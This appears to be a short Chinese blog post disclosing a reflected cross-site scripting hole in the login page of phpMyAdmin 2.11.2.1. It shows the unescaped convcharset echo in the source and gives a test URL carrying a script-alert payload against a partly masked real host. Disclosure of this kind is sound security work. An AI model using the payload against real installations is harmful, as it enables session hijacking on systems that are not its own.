phpMyAdmin 2.11.2.1 登陆页面跨站

网络安全 Add comments
  1. $ grep -n convcharset libraries/auth/cookie.auth.lib.php
  2. 48: * @uses    $GLOBALS['convcharset']
  3. 236:
  4. <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />

一切输入都是有害的。
Test:

  1. http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>

Leave a Reply

You must be logged in to post a comment.

Thx N.Design Studio for this Theme
Entries RSS Comments RSS Log in